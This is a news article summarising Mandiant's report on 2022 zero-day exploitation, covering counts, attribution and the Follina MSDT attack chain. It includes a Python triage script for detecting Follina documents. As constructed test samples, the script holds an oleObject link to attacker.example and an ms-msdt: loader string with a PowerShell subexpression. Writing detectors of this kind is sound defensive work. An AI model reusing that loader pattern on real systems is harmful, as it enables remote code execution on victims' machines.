A new report from Mandiant sheds light on the state of zero-day exploitation throughout 2022.
In 2022, 55 zero-day vulnerabilities were exploited in the wild, with the majority of the flaws found in software from Microsoft, Google, and Apple. This number is down from the 81 zero-days weaponized the year before, but it remains well above the totals recorded in 2020 and earlier, confirming that threat actors continue to rely on previously unknown security issues at a much higher rate than in the past.
According to threat intelligence firm Mandiant, the most exploited products were desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six). Thirteen of the 55 zero-day bugs were used by espionage groups, and four others were used by financially motivated threat actors for ransomware-related activities.
Three of the zero-days were linked to commercial spyware vendors. China-attributed state-sponsored groups have been identified as the most active, having taken advantage of seven zero-days (CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328).
Follina Zero-Day: Largely Exploited in 2022
Mandiant observed numerous campaigns using a vulnerability in the Microsoft Support Diagnostic Tool (MSDT), better known as Follina (CVE-2022-30190), to gain initial access. The vulnerability was unearthed by the nao_sec research team after they found a Word document uploaded to VirusTotal from a Belarusian IP address, and the researchers posted a series of tweets detailing their discovery. The attack chain works in two stages: the Word document carries an external oleObject relationship (a link rather than an embedded object), so opening it makes Word fetch an HTML page from a remote server; that page then invokes the ‘ms-msdt:’ URI scheme, which launches msdt.exe with attacker-controlled parameters in which PowerShell code can be injected. Because the payload runs through a signed Microsoft binary, it executes even when macros are disabled. Microsoft fixed the flaw in its June 2022 security updates; the interim workaround it published was to delete the ms-msdt protocol handler from the registry so the URI scheme could not be invoked at all.
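The two stages described above can be checked mechanically during triage: a .docx is a zip archive, so the external oleObject link is visible in word/_rels/document.xml.rels without opening Word, and the fetched HTML can be searched for the ms-msdt: scheme. The following Python is an added example, not code from Mandiant, nao_sec, or the original article. The sample document and HTML page are constructed inline to mirror the reported structure; the URL attacker.example, the file name loader.html, and the inert $(calc) parameter are placeholders, not indicators from any real sample.

```python
"""Triage helpers for Follina-style (CVE-2022-30190) delivery chains.

Added example: the .docx and the HTML page below are constructed test
inputs, not real samples. Only the Office relationship namespaces and the
ms-msdt: scheme itself are taken from the real technique.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by Office Open XML for relationship files and OLE links.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")

# Matches the scheme and the rest of the line it appears on; the real loader
# passed the whole command line (including quoted /param values) in one URI.
MSDT_URI = re.compile(r"ms-msdt:[^\r\n]*", re.IGNORECASE)


def find_external_ole_targets(docx_bytes: bytes) -> list:
    """Return Target URLs of oleObject relationships with TargetMode="External".

    A benign document embeds OLE objects inside the archive; an oleObject that
    points at an external HTTP URL is the hallmark of the Follina loader.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL
                        and rel.get("TargetMode", "").lower() == "external"):
                    hits.append(rel.get("Target"))
    return hits


def find_msdt_uris(html: str) -> list:
    """Return every ms-msdt: URI found in the HTML the document fetched."""
    return MSDT_URI.findall(html)


def triage(docx_bytes: bytes, fetched_html: str = "") -> dict:
    """Combine both checks into a single verdict for a document and its page."""
    targets = find_external_ole_targets(docx_bytes)
    uris = find_msdt_uris(fetched_html)
    if targets and uris:
        verdict = "follina-chain"
    elif targets:
        verdict = "suspicious-external-ole"
    else:
        verdict = "clean"
    return {
        "external_ole_targets": targets,
        "msdt_uris": uris,
        # "$(" inside the MSDT parameters is the PowerShell subexpression the
        # original exploit used to smuggle code through IT_BrowseForFile.
        "powershell_subexpression": any("$(" in u for u in uris),
        "verdict": verdict,
    }


def build_sample_docx(external: bool = True) -> bytes:
    """Build a minimal .docx in memory (constructed input, not a real sample).

    external=True links the oleObject to a remote HTML page as the Follina
    documents did; external=False embeds it locally, as a benign file would.
    """
    if external:
        target, mode = "http://attacker.example/loader.html!", ' TargetMode="External"'
    else:
        target, mode = "embeddings/oleObject1.bin", ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}"{mode}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed stand-in for the loader page; the parameter is inert.
SAMPLE_HTML = r"""<!doctype html>
<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(calc)\"";
</script></body></html>
"""

if __name__ == "__main__":
    print(triage(build_sample_docx(), SAMPLE_HTML))
    print(triage(build_sample_docx(external=False), "<html></html>"))
```

On a real case, feed the function the original attachment and the HTML captured from the proxy or sandbox; an external oleObject target alone is already worth escalating, because the remote page can be swapped after the document has been delivered.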
In 2022, Follina was weaponized by a variety of China-linked espionage clusters. Because the same exploit appeared across otherwise separate groups, Mandiant suggests it was likely supplied to them by “a digital quartermaster”, a centralized coordinating entity that shares exploit development and logistics resources among the clusters.
Threat actors from North Korea and Russia were each connected to two zero-day vulnerabilities: North Korean groups to CVE-2022-0609 (Chrome) and CVE-2022-41128 (the Internet Explorer JScript9 engine), and Russian groups to CVE-2022-30190 (Follina) and CVE-2023-23397 (Outlook, which carries a 2023 identifier but was exploited in 2022, well before its public disclosure). This comes at a time when threat actors are becoming more skilled at turning newly revealed vulnerabilities into working exploits against a wide range of targets across the globe, Mandiant pointed out.
Zero-Day Exploitation in 2022: the Conclusion
Of the 55 zero-day vulnerabilities identified in 2022, most were used to gain either remote code execution or elevated privileges, both of which align with the primary objectives of threat actors. While information disclosure vulnerabilities may be attention-grabbing because they can lead to the misuse of customer and user data, the damage they cause is usually limited. Gaining elevated privileges or executing code, on the other hand, lets the attacker move laterally through the network and extend the damage well beyond the initial point of access, the report concluded.